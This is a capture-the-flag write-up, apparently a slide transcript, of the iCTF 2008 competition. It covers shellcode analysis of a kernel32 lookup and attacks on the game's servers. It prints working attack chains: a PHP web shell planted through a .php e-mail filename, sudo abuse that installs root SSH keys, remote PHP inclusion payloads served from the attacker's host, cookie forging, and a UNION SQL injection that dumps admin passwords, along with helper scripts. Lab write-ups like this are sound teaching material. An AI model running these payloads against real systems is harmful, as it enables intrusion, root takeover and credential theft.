iCTF 2008

Uploaded by ashley-parks, posted 31-Dec-2015


iCTF 2008

Network Layout - 2008

[Network diagram. Node labels as extracted: UCSB Tunnel (Wireshark), UCSB Internet Gateway, Internet, Hub, IPS (Astaro), Prod VMware (Vuln, Wireshark), Hub, Switch, six Attacker hosts, NAS File Sharing, Test VMware (four Vuln hosts). Annotation on the diagram: special rule to send only traffic to/from the IPS to file sharing; chunked-up files.]

Timeline

0900 – Get fake FreeDOS image and begin

1100 – Realized the image is fake and re-vector

1700 – Head to Old Chicagos!

http://athena.uccs.edu/ictf/index.php/Hacking_08

The Premise

THE INTRO

It's 9am and somebody is franticly knocking on your door...

You open the door and Jack Bauer is right there on your doorstep looking at you with spirited eyes. He screams "Somebody set up us the bomb!"

You don't understand and reply: "What you say!", and then you slap Jack several times to get him out of his hysteric blubbering. After a few seconds he seems to regain control and starts talking...

"There is a nuclear device that is going to explode unless we stop it. We have only seven hours, until 4pm PST. The bomb has been set by a terrorist group called Softerror.com. We have been watching them for months. We knew they were up to something big. But we never would have imagined something of this size."

You are still incredulous and ask: "So what do you want from me?"

http://ictf.cs.ucsb.edu/archive/iCTF_2008/story.txt

Rules

0) We might create rules on the fly, if we need to do so. :-)

1) Do not break stuff permanently. In the original CTF you could just reboot your VMware machine. In this case, if you screw up your target, your target STAYS SCREWED. This might even mean that you are out of the competition (e.g., if you make a mistake and change the routing system or a firewall rule). Therefore, be careful. Also, services might run as root (you will have to break root in most cases anyway). Make sure you know what you are doing. If you are really stuck, please contact us ([email protected]), but we cannot guarantee that we can recover from the damage.

2) Do not perform DoS attacks or spoofing. No attack requires spoofing your source address. Spoofing malicious traffic so that other teams are penalized is considered lame and will be punished with immediate exclusion from the competition. Also, the resources that you are using are shared with other teams (using virtualization), even if you cannot see them. So if you overload your network, you are making life miserable for everybody else.

The network

Web Server could access Financial and Dev

Financial and Dev could access the Bomb

Firewall Rules prevented direct connections

Network Layout - 2008

[Same network diagram as above.]

iCTF 2008 - Trivia

Sample.bin

Question: You are training as a malware analyzer for the LA Counter Terrorist Unit. The Unit's Malware Pattern Miner (TM) software has determined that the snippet in attachment is extremely common in malicious samples used by the Softerror terrorist group. Assuming that the attackers are targeting a Windows XP machine, what is the content of the esi register at the end of the execution? NOTE: the correct answer is *not* the concrete address, but what it points to...

16-byte file: 64 A1 30 00 00 00 8B 40 0C 8B 70 1C AD 8B 70 08

IDA Analysis

seg000:00000000 ; Input MD5   : 31086BCBDAEC2CEF1352E11FBCBB16D4
seg000:00000000 ; ---------------------------------------------------------------------------
seg000:00000000 ; File Name   : C:\Users\Mike\Desktop\sample.bin
seg000:00000000 ; Format      : Binary file
seg000:00000000 ; Base Address: 0000h Range: 0000h - 0010h Loaded length: 0010h
seg000:00000000 .686p
seg000:00000000 .mmx
seg000:00000000 .model flat
seg000:00000000 ; ===========================================================================
seg000:00000000 ; Segment type: Pure code
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 mov     eax, large fs:30h    ; TEB -> PEB
seg000:00000006 mov     eax, [eax+0Ch]       ; PEB.Ldr
seg000:00000009 mov     esi, [eax+1Ch]       ; Ldr.InInitializationOrderModuleList.Flink (ntdll entry)
seg000:0000000C lodsd                        ; eax = next entry in the list (kernel32 on XP)
seg000:0000000D mov     esi, [eax+8]         ; that entry's DllBase
seg000:0000000D seg000 ends
seg000:0000000D end

Inline Assembly

Need to modify one instruction to compile it: MSVC's inline assembler does not accept IDA's "large" size prefix, so "mov eax, large fs:30h" becomes "mov eax, fs:30h". This only does something meaningful in a 32-bit Windows process, and the resulting esi is kernel32's base only on XP, which is what the question assumes.

int main()
{
    __asm {
        mov eax, fs:30h       // mov eax, large fs:30h
        mov eax, [eax+0Ch]
        mov esi, [eax+1Ch]
        lodsd
        mov esi, [eax+8]
    }
    return 0;
}

Function Pointers

No guessing of assembly mnemonics required, and no disassembler needed: put the raw bytes in a buffer and call it. Two caveats: the buffer must live in executable memory (with DEP on, the data segment is not, so build without /NXCOMPAT or mark the page executable), and the bytes contain no ret, so step through b() in a debugger and read esi rather than letting it run off the end of the buffer.

char a[] = "\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x70\x08";

int main()
{
    void (*b)() = (void (*)())a;   /* treat the byte string as code */
    b();                           /* esi holds the result; inspect it in the debugger */
    return 0;
}

Sample.bin Result

Pointer refers to: 0x7C800000, the image base of kernel32.dll on Windows XP.

An obfuscated way to access kernel32.dll without an import table; a common obfuscation technique for malware.

En0flag recommends google-fu on the whole thing.
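To see why those 16 bytes end up at kernel32's base, here is an added example (not from the slides or the iCTF organizers): a tiny interpreter for the five instruction forms in sample.bin, run over a constructed memory image laid out like Windows XP's TEB, PEB and PEB_LDR_DATA. The structure offsets (0x30, 0x0C, 0x1C, and the +8 from a list link to DllBase) are the real XP ones; every address in the image is made up for the demo. On Windows 7 and later kernelbase.dll sits between ntdll and kernel32 in the initialization-order list, so the same bytes would return a different module there.

```python
"""Added example (not from the slides): a tiny interpreter for the five
instruction forms in sample.bin, run over a constructed memory image laid
out like Windows XP's TEB/PEB/PEB_LDR_DATA, so the walk to kernel32's
DllBase can be followed without an XP box. The structure offsets (0x30,
0x0C, 0x1C, +0x08) are the real ones; all addresses are made up."""
import struct

SAMPLE = bytes.fromhex("64 A1 30 00 00 00 8B 40 0C 8B 70 1C AD 8B 70 08")

REGS = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

# Constructed addresses for the demo (not values from the slides).
TEB, PEB, LDR = 0x7FFDE000, 0x7FFDF000, 0x00191EA0
NTDLL_ENTRY, K32_ENTRY = 0x00191F18, 0x00191FB0
NTDLL_BASE, K32_BASE = 0x7C900000, 0x7C800000   # XP SP2/SP3 image bases


def build_memory():
    """Byte-addressable dict modelling the XP structures the sample walks."""
    mem = {}

    def put32(addr, val):
        for i, b in enumerate(struct.pack("<I", val)):
            mem[addr + i] = b

    put32(TEB + 0x30, PEB)                       # TEB.ProcessEnvironmentBlock
    put32(PEB + 0x0C, LDR)                       # PEB.Ldr
    # Ldr+0x1C is InInitializationOrderModuleList.Flink. It points at the
    # InInitializationOrderLinks field of an LDR_DATA_TABLE_ENTRY, which is
    # 0x10 into the entry; DllBase is at entry+0x18, hence the +8 in the code.
    put32(LDR + 0x1C, NTDLL_ENTRY + 0x10)        # first in init order: ntdll
    put32(NTDLL_ENTRY + 0x10, K32_ENTRY + 0x10)  # ntdll.Flink -> kernel32
    put32(NTDLL_ENTRY + 0x18, NTDLL_BASE)
    put32(K32_ENTRY + 0x10, LDR + 0x1C)          # kernel32.Flink -> list head
    put32(K32_ENTRY + 0x18, K32_BASE)
    return mem


def read32(mem, addr):
    return struct.unpack("<I", bytes(mem.get(addr + i, 0) for i in range(4)))[0]


def run(code, mem, fs_base):
    """Execute code and return the register file. Only the forms used by the
    sample are decoded: mov eax,fs:[disp32]; mov r32,[r32+disp8]; lodsd."""
    regs = dict.fromkeys(REGS, 0)
    pc = 0
    while pc < len(code):
        op = code[pc]
        if op == 0x64 and code[pc + 1] == 0xA1:          # 64 A1 disp32
            disp = struct.unpack_from("<I", code, pc + 2)[0]
            regs["eax"] = read32(mem, fs_base + disp)
            pc += 6
        elif op == 0x8B and (code[pc + 1] >> 6) == 1:    # 8B modrm disp8
            modrm = code[pc + 1]
            dst, src = REGS[(modrm >> 3) & 7], REGS[modrm & 7]
            disp = struct.unpack_from("<b", code, pc + 2)[0]
            regs[dst] = read32(mem, regs[src] + disp)
            pc += 3
        elif op == 0xAD:                                  # lodsd
            regs["eax"] = read32(mem, regs["esi"])
            regs["esi"] += 4
            pc += 1
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {pc}")
    return regs


def kernel32_base():
    """esi after the sample runs: what the trivia answer points to."""
    return run(SAMPLE, build_memory(), TEB)["esi"]


if __name__ == "__main__":
    print(f"esi = {kernel32_base():#010x}  (kernel32.dll DllBase)")
```

The interpreter refuses anything outside those three encodings, so feeding it a different blob fails loudly instead of silently misreading memory; the interesting part is build_memory(), which is the minimum an analyst has to know about the loader lists to read this kind of shellcode.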

iCTF 2008 – Main Competition (Hacking)

Softerror Website

Step 1

Analyze with Firefox web tools (Demo!)

Tools
▪ Firefox: Web Developer plugin, Firebug, Firecookie, Hackbar
▪ Paros proxy
▪ Base64 encode/decode: http://www.opinionatedgeek.com/dotnet/tools/Base64Encode/Default.aspx

createaccount.php

The account file is named after the e-mail address with only basename() applied, so an e-mail whose domain ends in .php (the "exploit .php domain in email addresses" from the recap) creates a .php file in the web-served users/ directory, and every field written into it is attacker-controlled:

$filename = "users/" . basename($email);
if (file_exists($filename)) {
    diefooter("Sorry, a user with that email already exists.");
}
$fh = fopen($filename, 'w+') or diefooter("I cannot create the account. Sorry.");
fwrite($fh, $password . "\n" . $first . ":" . $last . "\n" . $cc . ":" . $exp);
fclose($fh);

Simple PHP Shell

<?php system($_GET['cmd']); ?>

Put the shell in one of the fields that ends up in the account file (the password works) and the account file becomes a web shell. Use it to discover what's there:

http://128.198.60.76/users/[email protected]?cmd=ls -alR ../ > out.txt

www-data did not have shell access, so command output was redirected to out.txt and fetched over HTTP.

Files and Directories

../:
total 568
drwxr-xr-x  4 1001 1001   4096 Dec 14  2008 .
drwxr-xr-x 14 root root   4096 Dec 13  2008 ..
-rw-r--r--  1 1001 1001   1240 Dec 14  2008 about.php
-rw-r--r--  1 1001 1001   3218 Nov 26  2008 background2.jpg
-rw-r--r--  1 1001 1001   3675 Nov 26  2008 bomb.jpg
-rw-r--r--  1 1001 1001   2491 Nov 28  2008 contact.php
-rw-r--r--  1 1001 1001   1123 Nov 28  2008 createaccount.php
-rw-r--r--  1 1001 1001   3824 Nov 26  2008 explosion.jpg
-rw-r--r--  1 1001 1001   2758 Dec  4  2008 functions.php
drwxrwxrwx  2 1001 1001   4096 Nov  1 10:49 ideas
-rw-r--r--  1 1001 1001    989 Nov 28  2008 index.php
-rw-r--r--  1 1001 1001   1104 Nov 28  2008 join.php
-rw-r--r--  1 1001 1001   1057 Nov 28  2008 login.php
-rw-r--r--  1 1001 1001   5233 Nov 26  2008 main_bottom.jpg
-rw-r--r--  1 1001 1001   3862 Nov 26  2008 main_middle.jpg
-rw-r--r--  1 1001 1001   4936 Nov 26  2008 main_top.jpg
-rw-r--r--  1 1001 1001  28260 Nov 26  2008 missed.jpg
-rw-r--r--  1 1001 1001    175 Nov 26  2008 missed.php
-rw-r--r--  1 1001 1001    946 Nov 28  2008 mission.php
-rw-r--r--  1 1001 1001    596 Nov 27  2008 mission.txt
-rw-r--r--  1 1001 1001 268188 Nov 27  2008 president.mov
-rw-r--r--  1 1001 1001   3644 Nov 27  2008 prog.c
-rw-r--r--  1 1001 1001   4165 Nov 28  2008 softerror.css
-rw-r--r--  1 1001 1001 137313 Nov 26  2008 softerror_facilities.jpg
-rw-r--r--  1 root root    216 Dec  4  2008 test.php.old      <--- What is this?
-rw-r--r--  1 1001 1001  22892 Nov 26  2008 title.jpg
drwxrwxrwx  2 1001 1001   4096 Nov  1 10:56 users
-rw-r--r--  1 1001 1001    109 Nov 28  2008 variables.php

../ideas:
total 36
drwxrwxrwx 2 1001     1001     4096 Nov  1 10:49 .
drwxr-xr-x 4 1001     1001     4096 Dec 14  2008 ..
-rw-r--r-- 1 www-data www-data   37 Oct 29 21:48 idea1072674902.html
…

../users:
total 16
drwxrwxrwx 2 1001     1001     4096 Nov  1 10:56 .
drwxr-xr-x 4 1001     1001     4096 Dec 14  2008 ..
-rw-r--r-- 1 www-data www-data   72 Nov  1 10:54 [email protected]
-rw-r--r-- 1 www-data www-data    0 Nov  1 10:56 out.txt

test.php.old

Does sudo really work? A root-owned leftover test script that runs whatever it is given through sudo; if www-data has a passwordless sudo rule, this is root.

#!/usr/bin/php-cgi
<?php
require('variables.php');
require('functions.php');
myheader("Softerror.com - Financial Network");
system("id");
if ($_GET['cmd'] != "") {
    system("sudo " . $_GET['cmd']);
}
myfooter();
?>

What to do…

Root the box!

SSH Keys

AAAAB3NzaC1yc2EAAAABJQAAAIEAgMy2vBWaoSDYqthD6o4vNve8lMvWg5cs8mD3gPcDBsrrhHu5si6C4C9bsVd2iu/pDgfmNn3g6C1SvjOx4Rzq53LT0ccNfDy8dMsFATgyHC6J9I+B37VaPnHdtEHIrYMM5ig6zvj4eNQzxx0qCxsPXQyI+f1+nC03IOZCmDtH8Hs=

Adding the keys – the key has to be URL-encoded first, because +, / and = have meaning in a query string (a bare + arrives as a space and corrupts the key). The shell used here takes its command in the command parameter.

http://128.198.60.76/users/[email protected]?command=sudo mkdir /root/.ssh

http://128.198.60.76/users/[email protected]?command=echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAgMy2vBWaoSDYqthD6o4vNve8lMvWg5cs8mD3gPcDBsrrhHu5si6C4C9bsVd2iu%2fpDgfmNn3g6C1SvjOx4Rzq53LT0ccNfDy8dMsFATgyHC6J9I%2bB37VaPnHdtEHIrYMM5ig6zvj4eNQzxx0qCxsPXQyI%2bf1%2bnC03IOZCmDtH8Hs%3d > authorized_keys2

http://128.198.60.76/users/[email protected]?command=sudo mv authorized_keys2 /root/.ssh/authorized_keys2

http://128.198.60.76/users/[email protected]?command=sudo chown root:root /root/.ssh/authorized_keys2

W00t! Email UCSB and tell them what we did. Points.
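The key-drop chain above, as an added example (not from the slides): it builds the four requests with proper encoding and shows what the server would have received had the key been pasted in raw. HOST and the public key are the slides' values; the account filename is hypothetical (the real one is redacted in this transcript) and the parameter name follows the ?command= URLs above.

```python
"""Added example (not from the slides): build the request chain used against
the uploaded PHP shell and show why the key must be URL-encoded. HOST and the
public key are from the slides; SHELL is a hypothetical filename (the real one
is redacted in this transcript) and PARAM follows the ?command= URLs."""
from urllib.parse import quote, urlsplit, parse_qs

HOST = "http://128.198.60.76"
SHELL = "users/me@attacker.php"     # hypothetical: registered e-mail whose "domain" ends in .php
PARAM = "command"                   # query parameter the uploaded shell passes to system()

PUBKEY = ("ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAgMy2vBWaoSDYqthD6o4vNve8lMvWg5cs8mD3gPcDBs"
          "rrhHu5si6C4C9bsVd2iu/pDgfmNn3g6C1SvjOx4Rzq53LT0ccNfDy8dMsFATgyHC6J9I+B37VaPn"
          "HdtEHIrYMM5ig6zvj4eNQzxx0qCxsPXQyI+f1+nC03IOZCmDtH8Hs=")


def shell_url(cmd):
    """quote() with safe='' also encodes '/', '+', '=' and ' ', which the
    query-string parser would otherwise reinterpret (a bare '+' becomes a space)."""
    return f"{HOST}/{SHELL}?{PARAM}={quote(cmd, safe='')}"


def server_sees(url):
    """What PHP's $_GET[PARAM] receives for a given URL (parse_qs applies the
    same + -> space and %XX decoding rules PHP does)."""
    return parse_qs(urlsplit(url).query)[PARAM][0]


def key_drop_chain(pubkey, target="/root/.ssh"):
    """The four requests from the slides, each correctly encoded."""
    return [
        shell_url(f"sudo mkdir {target}"),
        shell_url(f"echo {pubkey} > authorized_keys2"),
        shell_url(f"sudo mv authorized_keys2 {target}/authorized_keys2"),
        shell_url(f"sudo chown root:root {target}/authorized_keys2"),
    ]


if __name__ == "__main__":
    for url in key_drop_chain(PUBKEY):
        print(url)
    raw = f"{HOST}/{SHELL}?{PARAM}={PUBKEY}"
    print("raw key survives the round trip:", server_sees(raw) == PUBKEY)
```

The last line is the point of the exercise: with the key pasted unencoded, server_sees() returns a string with spaces where the pluses were, which is exactly the broken authorized_keys2 you would otherwise spend an hour debugging.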

Onto Financial and Dev.

Assume we know the IP addresses (can scan for them): Financial: 128.198.60.77, Dev: 128.198.60.78

Nmap – Financial

root@ubuntuserver:/sbin# nmap 128.198.60.77

Starting Nmap 4.62 ( http://nmap.org ) at 2009-11-01 12:50 PST
Interesting ports on 128.198.60.77:
Not shown: 1713 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:57:F3:09 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.299 seconds

Nmap – Development

root@ubuntuserver:/sbin# nmap 128.198.60.78

Starting Nmap 4.62 ( http://nmap.org ) at 2009-11-01 12:52 PST
Interesting ports on 128.198.60.78:
Not shown: 1713 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
1337/tcp open  waste
MAC Address: 00:0C:29:8A:54:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.348 seconds

Tunnel

We cannot directly connect to HTTP on Financial; the firewall rules only let the web server reach it.

Could set up weird routes and/or DNAT/SNAT.

Easier to just use PuTTY/ssh to tunnel through the rooted web server (Tunnel Demo).

Financial – Level 1

Look inside the cookie:

YWRtaW4x:c4442e6e8420c452dfeb43463e045d58-YmFkZ3V5:edef990a12ef8fc35f890b8442c4062d-bGVuZGVy:8b9c2bba829069d84f1e77c3f25cb5ca

Format: Base64:MD5-Base64:MD5-Base64:MD5, one base64(username):md5 token per user. The three names decode to admin1, badguy and lender. Nothing in the token is keyed with a server secret, so a cookie can be rebuilt by anyone who can produce the matching hash.
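An added example (not from the slides) that parses the cookie above and mints a replacement token. The cookie string is the one on the slide; the slide only says each token is Base64:MD5, so treating the hash as md5(password) is this example's assumption, and the password it uses comes from the level-4 admins dump later in the deck.

```python
"""Added example (not from the slides): parse the level-1 cookie and mint a
replacement. The cookie string is the one on the slide; the slide only says
each token is Base64:MD5, so treating the hash as md5(password) is an
assumption of this example."""
import base64
import hashlib

COOKIE = ("YWRtaW4x:c4442e6e8420c452dfeb43463e045d58-"
          "YmFkZ3V5:edef990a12ef8fc35f890b8442c4062d-"
          "bGVuZGVy:8b9c2bba829069d84f1e77c3f25cb5ca")


def parse_cookie(cookie):
    """'b64(user):hex' tokens joined by '-' -> [(user, hex), ...]."""
    entries = []
    for token in cookie.split("-"):
        b64, digest = token.split(":", 1)
        entries.append((base64.b64decode(b64).decode(), digest))
    return entries


def forge_cookie(creds):
    """[(user, password), ...] -> cookie, assuming hash = md5(password).
    No server-side secret is involved, so this is all an attacker needs."""
    return "-".join(
        f"{base64.b64encode(user.encode()).decode()}:{hashlib.md5(pw.encode()).hexdigest()}"
        for user, pw in creds
    )


def check_password(cookie, user, candidate):
    """Offline check of a candidate password against one user's token."""
    for name, digest in parse_cookie(cookie):
        if name == user:
            return hashlib.md5(candidate.encode()).hexdigest() == digest
    return False


if __name__ == "__main__":
    print([name for name, _ in parse_cookie(COOKIE)])   # usernames in the cookie
    print(forge_cookie([("admin1", "baboon")]))          # assumed-format token
```

check_password() is the offline cracking loop in miniature: because the hash is unsalted and unkeyed, every token in every captured cookie can be tested against a wordlist without touching the server.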

Financial – Level 2

Username "a" creates account id "97"
Username "aa" creates account id "9797"
Username "aaa" creates account id "979797"

The account number is the ASCII decimal encoding of the username, so any user's account id can be computed from the name alone.

admin1 was the admin for the first level; maybe admin2 is the admin for the second level?

Financial – Level 3

Modifying the database name reveals PHP warnings.

Using the proxy we see hidden comments, including dbpath.

We can modify where the PHP script is included from (remote PHP include).

Financial – Level 3

Must disable PHP in Apache on 128.198.60.76, so that our server hands the payload out as plain text and it is executed by Financial's include(), not by our own web server:

<?php passthru("/bin/ls -alR > /home/level03/public_html/test.out"); ?>

srcacc=&srcabi=&srccab=&dstacc=&dstabi=&dstcab=&amount=&db=mytest&adminpw=&dbpath=http://128.198.60.76/

Financial – Level 3 – test.out

../:
total 80
drwxr-xr-x 3 level03 level03  4096 Nov  1 14:38 .
drwxr-xr-x 3 level03 level03  4096 Dec 14  2008 ..
-rw-r--r-- 1 level03 level03  3218 Nov 29  2008 background2.jpg
-rw-r--r-- 1 level03 level03  3675 Nov 29  2008 bomb.jpg
drwxr-x--x 3 level03 level03  4096 Dec  4  2008 cgi-bin
-rw-r--r-- 1 level03 level03  3824 Nov 29  2008 explosion.jpg
-rw-r--r-- 1 level03 level03    78 Nov 30  2008 index.html
-rw-r--r-- 1 level03 level03  5233 Nov 29  2008 main_bottom.jpg
-rw-r--r-- 1 level03 level03  3862 Nov 29  2008 main_middle.jpg
-rw-r--r-- 1 level03 level03  4936 Nov 29  2008 main_top.jpg
-rw-r--r-- 1 level03 level03  4249 Nov 30  2008 softerror.css
-rw-r--r-- 1 level03 level03     0 Nov  1 14:38 test.out
-rw-r--r-- 1 level03 level03 22892 Nov 29  2008 title.jpg

../cgi-bin:
total 36
drwxr-x--x 3 level03 level03 4096 Dec  4  2008 .
drwxr-xr-x 3 level03 level03 4096 Nov  1 14:38 ..
-rwxr-xr-x 1 level03 level03  415 Dec  1  2008 admin.php
drwxr-xr-x 2 level03 level03 4096 Nov 30  2008 databases
-rw-r--r-- 1 level03 level03 2387 Dec  4  2008 functions.php
-rwxr-xr-x 1 level03 level03 1067 Dec  4  2008 index.php
-rwxr-xr-x 1 level03 level03  154 Dec  3  2008 test.php
-rwxr-xr-x 1 level03 level03  815 Nov 30  2008 transaction.php
-rw-r--r-- 1 level03 level03  109 Nov 29  2008 variables.php

../cgi-bin/databases:
total 12
drwxr-xr-x 2 level03 level03 4096 Nov 30  2008 .
drwxr-x--x 3 level03 level03 4096 Dec  4  2008 ..
-rw-r--r-- 1 level03 level03  222 Nov 29  2008 softerror.php

Financial – Level 3

<?php passthru("/bin/cat /home/level03/public_html/cgi-bin/databases/softerror.php > /home/level03/public_html/test.out"); ?>

(For copy-paste purposes) srcacc=&srcabi=&srccab=&dstacc=&dstabi=&dstcab=&amount=&db=mytest&adminpw=&dbpath=http://128.198.60.76/

Financial – Level 3

Output:

<?php
$_DATABASE = array (
    "adminpw" => "tsirorret",
    "accounts" => array(
        "762816TYVSBR" => "16782:19911",
        "HJEY773TYEBB" => "18936:89849",
        "899814630KL8" => "78736:11100",
        "88277JJK019N" => "89383:00178"
    )
);
?>

Could install SSH keys at this time, maybe? I didn't check if these accounts can ssh :S

Financial – Level 4

Search for a group – search by size. A soft-error occurred:

Search failed: no such column: blah

4 columns returned – Name, Email, Size, Admin

Black-box thinking (how do we search by size?): SELECT Name, Email, Size, Admin FROM GroupFinancialContact WHERE Size > USERINPUT

Both error texts on these slides are SQLite's own messages, and "no such column: blah" means the input landed in the query unquoted, parsed as an identifier rather than a string.

Financial – Level 4

Incorrect admin/password. A soft-error occurred:

Authentication failed! User/password combination could not be found in admins table

Admins table – probably has columns: username, password

Financial – Level 4

Assumed query: SELECT Name,Email,GroupSize,CreateAdmin FROM GroupFinancialContact WHERE GroupSize > USERINPUT

Query we want: SELECT username,password FROM admins

We can UNION the two queries together: SELECT Name,Email,GroupSize,CreateAdmin FROM GroupFinancialContact WHERE GroupSize > SomeValue UNION SELECT username,password FROM admins

Financial – Level 4

Input to try: 1 UNION Select username,password FROM admins

A soft-error occurred: Search failed: SELECTs to the left and right of UNION do not have the same number of result columns

New input, padded with two literal columns so both SELECTs return four: 1 UNION Select 0,username,0,password FROM admins

Financial – Level 4 - Output

Name   Email                  Size   Admin
0      admin1                 0      baboon
0      admin4                 0      DaBomb
0      admin2                 0      wootwoot
0      admin3                 0      tsirorret
10     sdf                    10     admin1
5004   [email protected]    5004   admin3
20     [email protected]      20     admin2
       [email protected]      1021   admin1

(The first column of the last row was lost in the transcript.) The four rows with 0 in Name and Size are the admins table; note that admin3's password is the adminpw from the level 3 database dump.
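The level-4 search, rebuilt as an added example (not from the slides) on an in-memory SQLite database, so the two error messages quoted above and the padded UNION payload can be reproduced offline next to the parameterised query that defeats it. Table and column names follow the slides' assumed query; the admins rows are the values dumped above, while the group rows and their e-mail addresses are made up.

```python
"""Added example (not from the slides): the level-4 group search rebuilt on an
in-memory SQLite database. Table/column names follow the slides' assumed
query; the admins rows are from the slide, the group rows are made up."""
import sqlite3


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE GroupFinancialContact (Name, Email, GroupSize INTEGER, CreateAdmin);
        CREATE TABLE admins (username, password);
        INSERT INTO GroupFinancialContact VALUES
            ('sdf',     'sdf@example.test',    10,   'admin1'),
            ('lenders', 'lender@example.test', 5004, 'admin3'),
            ('small',   'small@example.test',  20,   'admin2');
        INSERT INTO admins VALUES
            ('admin1', 'baboon'), ('admin2', 'wootwoot'),
            ('admin3', 'tsirorret'), ('admin4', 'DaBomb');
    """)
    return db


def search_vulnerable(db, user_input):
    """String concatenation, as the slides inferred the app built the query."""
    sql = ("SELECT Name, Email, GroupSize, CreateAdmin FROM GroupFinancialContact "
           "WHERE GroupSize > " + str(user_input))
    return db.execute(sql).fetchall()


def search_safe(db, user_input):
    """Bound parameter: the input is compared as a value, never parsed as SQL."""
    return db.execute(
        "SELECT Name, Email, GroupSize, CreateAdmin FROM GroupFinancialContact "
        "WHERE GroupSize > ?", (user_input,)).fetchall()


def soft_error(db, user_input):
    """The database error text the app leaked in its soft-error page, or None."""
    try:
        search_vulnerable(db, user_input)
    except sqlite3.OperationalError as e:
        return str(e)
    return None


def dump_admins(db):
    """Two literal 0 columns pad the second SELECT to four columns; the admin
    rows come back with 0 in the Name and GroupSize positions, exactly as on
    the slide's output table."""
    rows = search_vulnerable(db, "1 UNION SELECT 0, username, 0, password FROM admins")
    return {email: admin for name, email, _size, admin in rows if name == 0}


if __name__ == "__main__":
    db = fresh_db()
    print(soft_error(db, "blah"))
    print(soft_error(db, "1 UNION SELECT username, password FROM admins"))
    print(dump_admins(db))
    print(search_safe(db, "1 UNION SELECT 0, username, 0, password FROM admins"))
```

With the bound parameter the whole payload is compared against GroupSize as a value and simply matches nothing; the leaking of raw database errors to the user is what turned a blind guess into a guided attack, and is worth fixing separately.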

Financial

Now, through an interactive shell, add SSH keys.

Now we can access and scan/nmap the bomb!

Recap – Common Theme

▪ Drop SSH keys
▪ Exploit .php domain in email addresses
▪ Understand common web data encode/decode techniques
▪ Know PHP and its vulnerabilities: includes, register_globals, etc.
▪ Understand basic web fuzzing techniques

iCTF 2008 - Development

Because binary may in fact be easier.

Nmap – Development

root@ubuntuserver:/sbin# nmap 128.198.60.78

Starting Nmap 4.62 ( http://nmap.org ) at 2009-11-01 12:52 PST
Interesting ports on 128.198.60.78:
Not shown: 1713 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
1337/tcp open  waste
MAC Address: 00:0C:29:8A:54:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.348 seconds

Development

root@ubuntuserver:/# telnet 128.198.60.78 1337
Trying 128.198.60.78...
Connected to 128.198.60.78.
Escape character is '^]'.
Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice: 2
Insert your task:
task 1 - kung fu go!
Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice: 1
task 1 - kung fu go!

Please select your choice:
    1) See the current tasks
    2) Add a task to the list
    3) Work as Developer 1
    4) Work as Developer 2
Your choice: 3
bash: no job control in this shell
devel1@ubuntuserver:/home/devel1$

Netstat – wasn't very helpful

devel1@ubuntuserver:/home/devel1$ netstat -anp
(Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1337            0.0.0.0:*               LISTEN      -
tcp        0      0 128.198.60.78:22        128.198.16.73:52962     ESTABLISHED -
tcp        1      0 128.198.60.78:1337      128.198.60.77:54691     ESTABLISHED 25710/bash
tcp6       0      0 :::22                   :::*                    LISTEN      -
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node PID/Program name    Path
unix  2      [ ]         DGRAM                    5316   -                   @/com/ubuntu/upstart
unix  2      [ ]         DGRAM                    5472   -                   @/org/kernel/udev/udevd
unix  5      [ ]         DGRAM                    12950  -                   /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     13035  -                   /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     360738 -                   /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     360737 -
unix  3      [ ]         STREAM     CONNECTED     359421 -                   /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     359420 -
unix  2      [ ]         DGRAM                    359417 -
unix  2      [ ]         DGRAM                    17625  -
unix  3      [ ]         STREAM     CONNECTED     13038  -
unix  3      [ ]         STREAM     CONNECTED     13037  -
unix  2      [ ]         DGRAM                    13008  -

Development – ps -A

devel1@ubuntuserver:/home/devel1$ ps -A
  PID TTY          TIME CMD
    1 ?        00:00:03 init
    2 ?        00:00:00 kthreadd
    3 ?        00:00:00 migration/0
    4 ?        00:00:03 ksoftirqd/0
    5 ?        00:00:00 watchdog/0
    6 ?        00:00:49 events/0
    7 ?        00:00:00 khelper
   46 ?        00:00:00 kintegrityd/0
   48 ?        00:00:02 kblockd/0
   50 ?        00:00:00 kacpid
   51 ?        00:00:00 kacpi_notify
  176 ?        00:00:00 cqueue
  180 ?        00:00:00 kseriod
  220 ?        00:00:00 pdflush
  221 ?        00:00:15 pdflush
  222 ?        00:00:00 kswapd0
  264 ?        00:00:00 aio/0
 1196 ?        00:00:00 ata/0
 1197 ?        00:00:00 ata_aux
 1205 ?        00:00:46 mpt_poll_0
 1993 ?        00:00:00 scsi_eh_0
 2072 ?        00:00:00 scsi_eh_1
 2073 ?        00:00:00 scsi_eh_2
 2195 ?        00:00:09 kjournald
 2313 ?        00:00:00 udevd
 3385 ?        00:00:00 kpsmoused
 4028 tty4     00:00:00 getty
 4029 tty5     00:00:00 getty
 4035 tty2     00:00:00 getty
 4037 tty3     00:00:00 getty
 4038 tty6     00:00:00 getty
 4077 ?        00:00:10 syslogd
